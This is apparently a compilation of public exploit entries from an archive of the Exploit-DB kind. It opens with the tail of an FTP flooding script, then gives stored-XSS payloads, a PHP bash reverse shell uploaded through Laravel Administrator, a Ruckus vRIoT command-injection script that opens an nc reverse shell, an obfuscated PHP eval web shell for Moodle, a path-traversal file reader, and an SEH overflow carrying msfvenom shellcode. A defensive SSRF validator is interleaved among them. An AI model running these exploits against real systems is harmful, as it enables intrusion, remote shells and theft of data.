             #print("Worker {} running".format(id))
         except OSError:
             pass

     def main():
         global target, port, start
         print banner
         try:
             target = sys.argv[1]
         except:
             print usage
             sys.exit()
         try:
             port = int(sys.argv[2])
         except:
             port = 21
         try:
             conns = int(sys.argv[3])
         except:
             conns = 50
         print("[!] Testing if {0}:{1} is open".format(target, port))
         test(target, port)
         print("[+] Port {} open, starting attack...".format(port))
         time.sleep(2)
         print("[+] Attack started on {0}:{1}!".format(target, port))

         def loop(target, port, conns):
             global start
             threading.Thread(target=timer).start()
             while 1:
                 for i in range(1, conns + 3):
                     t = threading.Thread(target=attack, args=(target,port,i,))
                     t.start()
                     if i > conns + 2:
                         t.join()
                         break
                 loop()

         t = threading.Thread(target=loop, args=(target, port, conns,))
         t.start()

         def timer():
             start = time.time()
             while 1:
                 if start < time.time() + float(900):
                     pass
                 else:
                     subprocess.Popen("pkill ftp", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
                     t = threading.Thread(target=loop, args=(target, port,))
                     t.start()
                     break

     main()
  8. # Exploit Title: SAP Lumira 1.31 - Stored Cross-Site Scripting
     # Date: 13.08.2020
     # Exploit Author: Ilca Lucian Florin
     # Vendor Homepage: https://www.sap.com
     # Software Link: SAP Lumira
     # Version: <= 1.31
     # Tested on: Windows 7 / Windows 10 / Internet Explorer 11 / Google Chrome 84.0.4147.105
     # Vulnerable System: https://system/BOE/BI

     # Reproduce Cross Site Scripting (XSS):
     1. Select Web Intelligence Button
     2. Wait for SAP Business Objects to load completely
     3. CTRL + N or click on New Document
     4. Create an empty document
     5. Select new variable
     6. Select a random name for the variable
     7. Add the XSS vectors from evidence
     8. Open the variable tab and click on the newly created variable name

     # Cross Site Scripting (XSS) Vectors Used:
     • "><h1><IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>123</h1>
     • <IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))">
  9. # Exploit Title: Wordpress Theme Wibar 1.1.8 - 'Brand Component' Stored Cross Site Scripting
     # Date: 11/27/2020
     # Exploit Author: Ilca Lucian Florin
     # Vendor Homepage: http://demo.themeftc.com/wibar
     # Software Link: https://themeforest.net/item/wibar-responsive-woocommerce-wordpress-theme/20994798
     # Version: 1.1.8
     # Tested on: Latest Version of Desktop Web Browsers: Chrome, Firefox, Microsoft Edge

     The WordPress theme contains a Brands feature which is vulnerable to stored cross site scripting. The logo URL parameter is vulnerable to cross site scripting. The following vector was used for testing XSS: "><script src="data:;base64,YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=="></script>.

     In order to reproduce the vulnerability, please follow the next steps:
     1. Log in as editor/administrator/contributor/author: https://website.com/wp-admin
     2. Go to the Brands section
     3. Click add new brand and add a custom brand title
     4. The vulnerable parameter is: Logo URL / <input type="text" name="ftc_brand_url" id="ftc_brand_url" value="">
     5. Add the following payload: "><script src="data:;base64,YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=="></script> , where base64 == alert(document.domain)
     6. Publish
     7. The alert will pop up when a user visits the website at https://website.com/brand/vulnerablebrand.

     Evidence:
     1. https://ibb.co/1fpYJWN
     2. https://ibb.co/S7j5Sgd

     C.V.S.S Score: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:L / 7.5 High
  10. # Exploit Title: WonderCMS 3.1.3 - 'uploadFile' Stored Cross-Site Scripting
      # Google Dork: "WonderCMS"
      # Date: 2020-11-27
      # Exploit Author: SunCSR (Sun* Cyber Security Research)
      # Vendor Homepage: https://www.wondercms.com/
      # Software Link: https://github.com/robiso/wondercms/releases/download/3.1.3/WonderCMS-3.1.3.zip
      # Version: 3.1.3
      # Tested on: Ubuntu 20.10

      Steps-To-Reproduce:
      1. Log in and select the settings button
      2. Go to the Files tab and upload a file containing an XSS payload with an extension such as html, svg or htm
      3. Go to http://target.lc/data/files/<name-file> and trigger the XSS

      POST /home HTTP/1.1
      Host: wordpress.lc:8081
      Content-Length: 372
      Cache-Control: max-age=0
      Upgrade-Insecure-Requests: 1
      Origin: http://wordpress.lc:8081
      Content-Type: multipart/form-data; boundary=----WebKitFormBoundary6EKP5vjUNS5Icgql
      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
      Referer: http://wordpress.lc:8081/
      Accept-Encoding: gzip, deflate
      Accept-Language: vi,vi-VN;q=0.9,en-US;q=0.8,en;q=0.7
      Cookie: PHPSESSID=74me71gverejuaf2bns2n5fpkf
      Connection: close

      ------WebKitFormBoundary6EKP5vjUNS5Icgql
      Content-Disposition: form-data; name="uploadFile"; filename="xss.html"
      Content-Type: text/html

      <script>alert('XSS')</script>
      ------WebKitFormBoundary6EKP5vjUNS5Icgql
      Content-Disposition: form-data; name="token"

      5d715f2aebdf138f4968fce8dcd3703778c6fb5a1abea40e27eb9280079474da
      ------WebKitFormBoundary6EKP5vjUNS5Icgql--
  11. # Exploit title: Laravel Administrator 4 - Unrestricted File Upload (Authenticated)
      # Author: Victor Campos and Xavi Beltran
      # Contact: vcmartin@protonmail.com
      # Exploit Development: https://xavibel.com/2020/03/23/unrestricted-file-upload-in-frozennode-laravel-administrator/
      # Date: 25/3/2020
      # Software link: https://github.com/FrozenNode/Laravel-Administrator/
      # Version : 4
      # Tested on: Laravel-Administrator 4
      # CVE : CVE-2020-10963

      #!/usr/bin/env python
      import requests,json,traceback
      from requests.auth import HTTPBasicAuth

      #Parameters to be set up (ENTER YOUR VALUES)
      #===========================================

      # Listener IP and port
      ip = ""
      port = ""

      #Admin credentials
      user = ""
      password = ""

      #URLs of the web application
      domain = ""              # For example "https://www.example.com"
      login_url = ""           # For example "/user/login"
      fileupload_url = ""      # For example "/admin/categories/image/file_upload"
      uploaded_files_url = ""  # For example "/categories/images"

      #Reverse shell payload (DO NOT MODIFY THIS SECTION)
      #==================================================

      #GIF file header
      shell = "GIF89a\r\n"
      #php reverse shell
      shell += "\x3c?php\r\nexec(\"/bin/bash -c \'bash -i \x3e /dev/tcp/" + ip + "/" + port + " 0\x3e&1\'\");?\x3e\r\n"

      with requests.Session() as s:
          try:
              print("\n[+] Logging into the panel")
              s.post(domain + login_url, data={'email':user,'password':password,'remember': '1'})

              print("[+] Uploading the malicious file")
              r = s.post(domain + fileupload_url, files={'name':'Picture.png','file': ('test.php',shell)})
              print("[+] Response text:")
              #print(r.text)
              shell_file = (json.loads(r.text))["filename"]
              print("[+] Name of uploaded file: "  + shell_file)

              print("\n[+] Executing the reverse shell on " + ip + ":" + port + "...")
              r = s.get(domain + uploaded_files_url + '/' + shell_file)
          except Exception as e:
              print(str(traceback.format_exc()))
  12. # Product: Ruckus IoT Controller (Ruckus vRIoT)
      # Version: <= 1.5.1.0.21
      # Vendor: https://support.ruckuswireless.com/
      # Vulnerability: Command Injection & Broken Authentication
      # References: CVE-2020-26878
      # Discovered by: Juan Manuel Fernandez
      # Exploit Title: Ruckus IoT Controller (Ruckus vRIoT) 1.5.1.0.21 - Remote Code Execution
      # Exploit Author: Emre SUREN
      # Disclosure Date: 2020-10-26
      # Tested on: Appliance

      #!/usr/bin/python
      # -*- coding: utf-8 -*-

      import requests, urllib3, sys
      from Crypto.Cipher import AES
      from base64 import b64encode, b64decode
      from colorama import Fore

      urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

      def listen(lhost, lport):
          opt = str(raw_input(Fore.YELLOW + "[?] Listening " + lhost + " " + lport + " (i.e. netcat) ? (y/n): "))
          if opt == "y":
              return True
          else:
              return False

      def generatePayload(lhost, lport):
          payload="; rm /tmp/f; mkfifo /tmp/f; cat /tmp/f|/bin/sh -i 2>&1|nc "+lhost+" "+lport+" >/tmp/f; #"
          return payload

      def generateMagicToken():
          enc_dec_method = 'utf-8'
          salt = 'nplusServiceAuth'
          salt = salt.encode("utf8")
          str_key = 'serviceN1authent'
          str_to_enc = 'TlBMVVMx'
          return encrypt(enc_dec_method, salt, str_key, str_to_enc)

      def encrypt(enc_dec_method, salt, str_key, str_to_enc):
          aes_obj = AES.new(str_key, AES.MODE_CFB, salt)
          hx_enc = aes_obj.encrypt(str_to_enc.encode("utf8"))
          mret = b64encode(hx_enc).decode(enc_dec_method)
          return mret

      def execCmd(rhost, rport, lhost, lport):
          payload = generatePayload(lhost, lport)
          post_data = {
              "username": payload,
              "password": "test"
          }
          print(Fore.BLUE + "[*] Payload\t: " + payload)

          token = generateMagicToken()
          headers = {
              "Authorization": token
          }

          rpath = "/service/v1/createUser"
          uri = 'https://' + rhost + ":" + rport + rpath
          r = requests.post(uri, json=post_data, headers=headers, verify=False)
          print(Fore.BLUE + "[*] Request sent")

          if r.status_code == 200:
              print(Fore.GREEN + "[+] Successful. Check for the session...")
          else:
              print(Fore.RED + "[X] Failed. Check for the response...")
              print(Fore.BLUE + "[*] Response\t: " + r.text)
              sys.exit()

      def main():
          if (len(sys.argv) != 5):
              print("[*] Usage: ruckus151021.py <RHOST> <RPORT> <LHOST> <LPORT>")
              print("[*] <RHOST> -> Target IP")
              print("[*] <RPORT> -> Target Port")
              print("[*] <LHOST> -> Attacker IP")
              print("[*] <LPORT> -> Attacker Port")
              print("[*] Example: python {} 192.168.2.25 443 192.168.2.3 9001".format(sys.argv[0]))
              exit(0)

          rhost = sys.argv[1]
          rport = sys.argv[2]
          lhost = sys.argv[3]
          lport = sys.argv[4]

          if not listen(lhost, lport):
              print(Fore.RED + "[!] Please listen at port {} to connect a reverse session !".format(lport))
          else:
              execCmd(rhost, rport, lhost, lport)

      if __name__ == "__main__":
          main()
  13. # Exploit Title: Moodle 3.8 - Unrestricted File Upload
# Date: 2019-09-08
# Exploit Author: Sirwan Veisi
# Vendor Homepage: https://moodle.org/
# Software Link: https://github.com/moodle/moodle
# Version: Moodle Versions 3.8, 3.7, 3.6, 3.5, 3.4...
# Tested on: Moodle Version 3.8
# CWE : CWE-434

I found an Unrestricted Upload vulnerability for Moodle version 3.8, which allows the attacker to upload or transfer files of dangerous types.

Example exploitation request:

POST /repository/repository_ajax.php?action=upload HTTP/1.1
Host: VulnerableHost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------38898830537874132223151601680
Content-Length: 2763
Origin: https://VulnerableHost
Connection: close
Referer: https://VulnerableHost/user/files.php
Cookie: MoodleSession=bpn90khjdh7mq4phs8i9r0caai
Upgrade-Insecure-Requests: 1

-----------------------------38898830537874132223151601680
Content-Disposition: form-data; name="repo_upload_file"; filename="image.php"
Content-Type: image/jpeg

GIF89a;
<?php
$Q=str_replace('kz','','crekzakztkze_kzfunckztkzion');
$O='"";for%(%$i=%0;$i<$l;){for%($j=0%;($j<$c&%&$i<$l);$%j++,$i+%+%){$o.=$%t{$i';
$l='_contents(%"php:%//input"),%$m)=%=1){@ob%_start();%@eva%l(@gzunc%o%mpress(%@';
$C='$k="3%fbd6%8c8"%;$kh="2a%e%7d638909f";$%kf%="60eb0ffaeb%1%7";$p="dP%FT1%';
$h='x(@b%ase%6%4_decode($m[1%]),$k)));%$o=@o%b_get_conte%%nts();@ob_end%%_c%lean';
$N='}%%^$k{$j};}}retu%rn $o;}i%f(@preg%_matc%%h("/$kh(.+)$%%k%f%/",@file_ge%t';
$e='Nmy694Bcj%Vc";fu%nction% x(%$t,$k){$c=st%rle%n%($%%k);$l=strlen($t)%;$o=';
$V='();$r=@bas%e64_en%cod%e(@x(@%%gzcomp%ress($o),$k))%;%print("$%p$kh$r$kf");}';
$P=str_replace('%','',$C.$e.$O.$N.$l.$h.$V);
$n=$Q('',$P);$n();
?>
-----------------------------
  14. # Exploit Title: Acronis Cyber Backup 12.5 Build 16341 - Unauthenticated SSRF
# Date: 2020-07-30
# Author: Julien Ahrens
# Vendor Homepage: https://www.acronis.com
# Version: 12.5 Build 16341
# CVE: CVE-2020-16171

VERSIONS AFFECTED
====================
Acronis Cyber Backup v12.5 Build 16327 and probably below.

VULNERABILITY DETAILS
========================
All API endpoints running on port 9877 under "/api/ams/", some of which are reachable without authentication, accept an additional custom header called "Shard":

def get_ams_address(headers):
    if 'Shard' in headers:
        [...]
        return headers.get('Shard')  # Mobile agent >= ABC5.0

The value of this header is afterwards used to construct a separate web request sent by the application using a urllib.request.urlopen call:

def make_request_to_ams(resource, method, data=None):
    port = config.CONFIG.get('default_ams_port', '9892')
    uri = 'http://{}:{}{}'.format(get_ams_address(request.headers), port, resource)
    logging.debug('Making request to AMS %s %s', method, uri)
    headers = dict(request.headers)
    del headers['Content-Length']
    if not data is None:
        headers['Content-Type'] = 'application/json'
    req = urllib.request.Request(uri, headers=headers, method=method, data=data)
    resp = None
    try:
        resp = urllib.request.urlopen(req, timeout=wcs.web.session.DEFAULT_REQUEST_TIMEOUT)
    except Exception as e:
        logging.error('Cannot access ams {} {}, error: {}'.format(method, resource, e))
    return resp

This can be abused to conduct SSRF attacks against otherwise unreachable internal hosts of Acronis services that are bound to localhost, such as the "NotificationService" running on 127.0.0.1:30572, with a request header like:

Shard: localhost:30572/external_email?

For more details, see the referenced blog post.

RISK
=======
The vulnerability can be used by an unauthenticated or authenticated attacker to query otherwise unreachable internal network resources. As demonstrated in the corresponding blog post, using this vulnerability it is possible to i.e. (amongst others) send out fully customized emails or modify the application's resource settings.

7. SOLUTION
===========
Update to v12.5 Build 16342

8. REPORT TIMELINE
==================
2020-07-30: Discovery of the vulnerability
2020-07-30: Since the vulnerability is fixed in Cyber Protect: Sent out a request to the Vendor to check whether Cyber Backup is EOL and users are advised to migrate to Cyber Protect instead.
2020-07-30: CVE requested from MITRE
2020-07-31: MITRE assigns CVE-2020-16171
2020-07-31: Public Disclosure date set to 2020-08-14
2020-08-04: Vendor asks for a 90 days extension
2020-08-04: Extension not granted because there is a fix available already. Public disclosure date set to 2020-09-14
2020-09-05: Asking vendor about the status of the fix
2020-09-08: Vendor states that a fix has been backported to Cyber Backup 12.5 under the reference ABR-202103
2020-09-14: Public disclosure

9. REFERENCES
=============
https://www.rcesecurity.com/2020/09/CVE-2020-16171-Exploiting-Acronis-Cyber-Backup-for-Fun-and-Emails/
https://dl.acronis.com/u/backup/rn/12.5/user/en-US/AcronisBackup12.5_relnotes.htm
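The advisory above shows the Shard header being passed straight from the request into a URL. As an added defensive illustration, not part of the advisory or of Acronis's code, the following Python validates that header against an explicit allowlist of AMS hosts and a bare-host grammar before the upstream URI is built. The allowlist entries, the `make_ams_uri` and `shard_is_allowed` helpers and the plain-dict header access are assumptions of this example.

```python
import re
from urllib.parse import urlsplit

# Constructed allowlist for this example: the only AMS hosts the proxy may
# forward to. The vulnerable handler accepted any value of the Shard header.
ALLOWED_AMS_HOSTS = {"ams-01.backup.internal", "10.10.5.20"}
DEFAULT_AMS_PORT = "9892"   # the default the advisory's code reads from config

# Bare DNS name or IPv4 literal: no scheme, path, query, fragment or port.
_HOST_RE = re.compile(r"^[A-Za-z0-9](?:[A-Za-z0-9.-]{0,251}[A-Za-z0-9])?$")


class BadShardHeader(ValueError):
    """The Shard header could not be mapped to an allowed AMS host."""


def get_ams_address(headers, allowlist=ALLOWED_AMS_HOSTS):
    """Hardened replacement for the unchecked headers.get('Shard').

    Anything that is not a bare, allowlisted host name is rejected, so a
    value such as 'localhost:30572/external_email?' can no longer redirect
    the internal request to a different service or path.
    """
    shard = headers.get("Shard")
    if shard is None:
        raise BadShardHeader("missing Shard header")
    shard = shard.strip()
    # Characters that would smuggle a port, path, query, fragment or userinfo.
    if any(c in shard for c in ":/?#@\\ "):
        raise BadShardHeader("Shard must be a bare host, got %r" % shard)
    if not _HOST_RE.match(shard):
        raise BadShardHeader("invalid host syntax in Shard: %r" % shard)
    if shard not in allowlist:
        raise BadShardHeader("Shard host %r is not an allowed AMS" % shard)
    return shard


def shard_is_allowed(headers, allowlist=ALLOWED_AMS_HOSTS):
    """Boolean convenience wrapper around get_ams_address (example helper)."""
    try:
        get_ams_address(headers, allowlist)
        return True
    except BadShardHeader:
        return False


def make_ams_uri(headers, resource, port=DEFAULT_AMS_PORT):
    """Assemble the upstream URI the way make_request_to_ams did, but only
    from a validated host, then confirm that the resource path did not alter
    the authority of the resulting URL (hypothetical helper for this example).
    """
    host = get_ams_address(headers)
    if not resource.startswith("/") or resource.startswith("//"):
        raise BadShardHeader("resource must be a single absolute path")
    uri = "http://{}:{}{}".format(host, port, resource)
    parts = urlsplit(uri)
    if parts.hostname != host.lower() or str(parts.port) != str(port):
        raise BadShardHeader("authority changed after URL assembly")
    return uri
```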
  15. # Exploit Title: Setelsa Conacwin 3.7.1.2 - Local File Inclusion
# Date: 02/09/20
# Exploit Author: Bryan Rodriguez Martin AKA tr3mb0
# Vendor Homepage: http://setelsa-security.es/productos/control-de-acceso/
# Version: 3.7.1.2
# Tested on: Windows
# FIX: The recommendation from the vendor is to update to the last version.

import requests
import urllib.parse
import colorama
from colorama import Fore, Style

ENDPOINT = "http://10.4.8.11:8081/"

while True:
    cmd = input(Fore.RED + "[*] FILE >> ")
    print(Style.RESET_ALL)
    #cmd = urllib.parse.quote(cmd)
    ENDPOINT2 = ENDPOINT + "..%2F..%2F" + cmd
    print("[*] Target >> " + ENDPOINT2)
    print(" ")
    r = requests.get(url = ENDPOINT2)
    extract = r.text
    print(extract)
  16. # Exploit Title: 10-Strike Network Inventory Explorer 8.65 - Buffer Overflow (SEH)
# Date: 2020-09-02
# Exploit Author: Sectechs
# Vendor Homepage: https://www.10-strike.com
# Version: 8.65
# Tested on: Windows 7 x86 SP1

import os
import sys
import struct
import socket

crash ="A"* 209

# jmp short 8
# kali@root:msf-nasm_shell
# nasm> jmp short 8
Next_SE_Pointer = "\xeb\x06\x90\x90"

# 61e8497a
SE_Handler="\x7a\x49\xe8\x61"

# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.6.211 LPORT=5555 -f c -b "\x00" -e x86/alpha_mixed
payload = (
"\xdb\xc3\xd9\x74\x24\xf4\x5e\x56\x59\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a\x41"
"\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42"
"\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x49"
"\x6c\x59\x78\x6d\x52\x43\x30\x53\x30\x75\x50\x33\x50\x4f\x79"
"\x69\x75\x34\x71\x69\x50\x32\x44\x4e\x6b\x32\x70\x64\x70\x6c"
"\x4b\x76\x32\x54\x4c\x4e\x6b\x31\x42\x66\x74\x6c\x4b\x72\x52"
"\x74\x68\x44\x4f\x48\x37\x42\x6a\x34\x66\x76\x51\x79\x6f\x6c"
"\x6c\x77\x4c\x65\x31\x53\x4c\x74\x42\x64\x6c\x77\x50\x39\x51"
"\x38\x4f\x74\x4d\x66\x61\x38\x47\x59\x72\x48\x72\x52\x72\x63"
"\x67\x6c\x4b\x66\x32\x56\x70\x6c\x4b\x43\x7a\x45\x6c\x6c\x4b"
"\x30\x4c\x76\x71\x43\x48\x4b\x53\x62\x68\x45\x51\x4b\x61\x43"
"\x61\x4c\x4b\x73\x69\x57\x50\x37\x71\x68\x53\x4e\x6b\x52\x69"
"\x36\x78\x6d\x33\x46\x5a\x43\x79\x4e\x6b\x35\x64\x4c\x4b\x77"
"\x71\x5a\x76\x75\x61\x6b\x4f\x4e\x4c\x4b\x71\x58\x4f\x46\x6d"
"\x65\x51\x5a\x67\x66\x58\x79\x70\x63\x45\x6a\x56\x75\x53\x63"
"\x4d\x6c\x38\x45\x6b\x53\x4d\x54\x64\x32\x55\x4b\x54\x52\x78"
"\x6e\x6b\x71\x48\x71\x34\x77\x71\x5a\x73\x55\x36\x6e\x6b\x56"
"\x6c\x50\x4b\x4e\x6b\x50\x58\x55\x4c\x36\x61\x78\x53\x6c\x4b"
"\x54\x44\x4e\x6b\x65\x51\x5a\x70\x6d\x59\x71\x54\x36\x44\x67"
"\x54\x73\x6b\x51\x4b\x51\x71\x50\x59\x50\x5a\x62\x71\x79\x6f"
"\x4b\x50\x73\x6f\x51\x4f\x63\x6a\x4e\x6b\x55\x42\x58\x6b\x4e"
"\x6d\x53\x6d\x45\x38\x65\x63\x74\x72\x35\x50\x55\x50\x53\x58"
"\x62\x57\x31\x63\x37\x42\x61\x4f\x36\x34\x33\x58\x32\x6c\x53"
"\x47\x31\x36\x73\x37\x4b\x4f\x49\x45\x68\x38\x4c\x50\x56\x61"
"\x33\x30\x57\x70\x44\x69\x68\x44\x76\x34\x30\x50\x32\x48\x67"
"\x59\x6d\x50\x50\x6b\x73\x30\x39\x6f\x59\x45\x32\x70\x72\x70"
"\x72\x70\x70\x50\x71\x50\x52\x70\x31\x50\x70\x50\x33\x58\x6a"
"\x4a\x36\x6f\x49\x4f\x6b\x50\x69\x6f\x38\x55\x4a\x37\x33\x5a"
"\x43\x35\x43\x58\x4f\x30\x6f\x58\x66\x66\x4e\x33\x73\x58\x46"
"\x62\x35\x50\x32\x35\x4c\x73\x6d\x59\x38\x66\x62\x4a\x72\x30"
"\x50\x56\x36\x37\x71\x78\x7a\x39\x59\x35\x42\x54\x35\x31\x79"
"\x6f\x4b\x65\x4b\x35\x39\x50\x52\x54\x54\x4c\x69\x6f\x30\x4e"
"\x47\x78\x52\x55\x38\x6c\x61\x78\x4c\x30\x58\x35\x79\x32\x33"
"\x66\x79\x6f\x4a\x75\x72\x48\x35\x33\x52\x4d\x71\x74\x53\x30"
"\x4d\x59\x59\x73\x51\x47\x50\x57\x70\x57\x75\x61\x78\x76\x33"
"\x5a\x76\x72\x73\x69\x51\x46\x48\x62\x6b\x4d\x70\x66\x6b\x77"
"\x47\x34\x57\x54\x37\x4c\x57\x71\x46\x61\x6e\x6d\x32\x64\x46"
"\x44\x44\x50\x79\x56\x65\x50\x37\x34\x73\x64\x56\x30\x52\x76"
"\x33\x66\x62\x76\x67\x36\x32\x76\x42\x6e\x56\x36\x32\x76\x62"
"\x73\x43\x66\x45\x38\x51\x69\x78\x4c\x37\x4f\x6b\x36\x49\x6f"
"\x58\x55\x4c\x49\x39\x70\x62\x6e\x73\x66\x71\x56\x39\x6f\x76"
"\x50\x55\x38\x35\x58\x6c\x47\x47\x6d\x45\x30\x79\x6f\x69\x45"
"\x6d\x6b\x78\x70\x6c\x75\x4c\x62\x73\x66\x35\x38\x69\x36\x7a"
"\x35\x6d\x6d\x4d\x4d\x39\x6f\x5a\x75\x67\x4c\x67\x76\x51\x6c"
"\x45\x5a\x4f\x70\x69\x6b\x39\x70\x54\x35\x36\x65\x6d\x6b\x33"
"\x77\x56\x73\x43\x42\x30\x6f\x72\x4a\x65\x50\x62\x73\x49\x6f"
"\x68\x55\x41\x41")

buffer = crash + Next_SE_Pointer + SE_Handler + "\x90" * 20 + payload + "\x90" * 200

f=open("PoC6.txt","w")
f.write(buffer)
f.close()

'''
 ----------------------------------
|        NEXT SEH Pointer          | --|------ ESP
|                                  |   | <------- A * 209
 ----------------------------------
|        SE_Handler                |  ▲
|        #POP #POP #RET            |  |
 ----------------------------------   |
          |                           |
          ▼        Stack              |
          |______ ►  ---------------------------
                     |        PAYLOAD          | -------- ► call | KALI |
                     ---------------------------
'''
  17. # Exploit Title: Multi Restaurant Table Reservation System 1.0 - Multiple Persistent XSS
# Date: 01-11-2020
# Exploit Author: yunaranyancat
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/tablereservation.zip
# Version: 1.0
# Tested on: Ubuntu 18.04 + XAMPP 7.4.11

Summary: Multiple Persistent Cross-site Scripting in Multi Restaurant Table Reservation System allows attacker to gain sensitive information using these vulnerabilities.

# POC No.1
Persistent XSS vulnerability at /dashboard/profile.php triggered by adding payload in Restaurant Name field

### Sample request POC #1

POST /TableReservation/dashboard/profile.php HTTP/1.1
Host: [TARGET URL/IP]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://[TARGET URL/IP]/TableReservation/dashboard/profile.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 122
Cookie: PHPSESSID=0095837d1f0f69aa6c35a0bf2f70193c
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1

fullname=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&email=lol%40lol&phone=123456789&area=1&address=lol&password=lol&save=Save

# POC No.2
Persistent XSS vulnerability at /dashboard/table-list.php triggered by adding payload in Table Name field in table-add.php

### Sample request POC #2

POST /TableReservation/dashboard/manage-insert.php HTTP/1.1
Host: [TARGET URL/IP]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://[TARGET URL/IP]/TableReservation/dashboard/table-add.php
Content-Type: multipart/form-data; boundary=---------------------------424640138424818065256966622
Content-Length: 321
Cookie: PHPSESSID=d464c277434e6f2cf4358f59a368b090
Connection: close
Upgrade-Insecure-Requests: 1

-----------------------------424640138424818065256966622
Content-Disposition: form-data; name="tablename"

<script>alert("XSS")</script>
-----------------------------424640138424818065256966622
Content-Disposition: form-data; name="addtable"

Add Table
-----------------------------424640138424818065256966622--

# POC No. 3
Persistent XSS vulnerability at /dashboard/menu-list.php triggered by adding payload in Item Name field in menu-add.php

# POC No. 4
Persistent XSS vulnerability at /dashboard/menu-list.php triggered by adding payload in Made by field in menu-add.php

# POC No. 5
Persistent XSS vulnerability at /dashboard/menu-list.php triggered by modifying value of Area(food_type) dropdown to XSS payload in menu-add.php

### Sample request POC #3, #4 & #5

POST /TableReservation/dashboard/manage-insert.php HTTP/1.1
Host: [TARGET URL/IP]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://[TARGET URL/IP]/TableReservation/dashboard/menu-add.php
Content-Type: multipart/form-data; boundary=---------------------------165343425917898292661480081499
Content-Length: 6641
Cookie: PHPSESSID=d464c277434e6f2cf4358f59a368b090
Connection: close
Upgrade-Insecure-Requests: 1

-----------------------------165343425917898292661480081499
Content-Disposition: form-data; name="itemname"

<script>alert("XSS1")</script>
-----------------------------165343425917898292661480081499
Content-Disposition: form-data; name="price"

1
-----------------------------165343425917898292661480081499
Content-Disposition: form-data; name="madeby"

<svg onload=alert("XSS2")>
-----------------------------165343425917898292661480081499
Content-Disposition: form-data; name="food_type"

<svg onload=prompt("XSS4")>
-----------------------------165343425917898292661480081499
Content-Disposition: form-data; name="image"; filename="image.jpeg"
Content-Type: image/jpeg

.. [REDACTED CONTENT OF image.jpeg] ..
----------------------------165343425917898292661480081499
Content-Disposition: form-data; name="addItem"

Add Item
-----------------------------165343425917898292661480081499--
  18. # Exploit Title: LEPTON CMS 4.7.0 - 'URL' Persistent Cross-Site Scripting
# Date: 19-11-2020
# Exploit Author: Sagar Banwa
# Vendor Homepage: https://lepton-cms.org/
# Software Link: https://lepton-cms.org/english/download/archive.php
# Version: 4.7.0
# Tested on: Windows 10/Kali Linux
# CVE: CVE-2020-29240

Stored Cross-site scripting(XSS):
Stored XSS, also known as persistent XSS, is the more damaging of the two. It occurs when a malicious script is injected directly into a vulnerable web application. Reflected XSS involves the reflecting of a malicious script off of a web application, onto a user's browser.

Vulnerable Parameters: Pages URL.

Steps-To-Reproduce:
1. Login to the Admin Account
2. Go to the Menu-Pages-Pages Overview.
3. Now edit any page
4. Put the below payload in the url input box.
5. ex. https://localhost/_packinstall/"onmouseover=prompt(/xss/)>

POST /LEPTONmvkzycfafg/modules/wrapper/save.php?leptoken=a8274f4a99bb3c2d1d857z1606411062 HTTP/1.1
Host: localhost
Connection: close
Content-Length: 130
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: https://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://localhost/LEPTONmvkzycfafg/backend/pages/modify.php?page_id=1&leptoken=33bfc986e094ce5dd7655z1606411059
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: lep5031sessionid=75627dd11a0e789c4e560f7a93cd3153

page_id=1&section_id=1&url=https%3A%2F%2Flocalhost%2F_packinstall%2F%22onmouseover%3Dprompt%28%2Fxss%2F%29%3E+&height=900
  19. # Exploit Title: Tailor Management System 1.0 - Unrestricted File Upload to Remote Code Execution
# Exploit Author: Saeed Bala Ahmed (r0b0tG4nG)
# Date: 2020-09-18
# Vendor Homepage: https://www.sourcecodester.com/php/14378/tailor-management-system-php-mysql.html
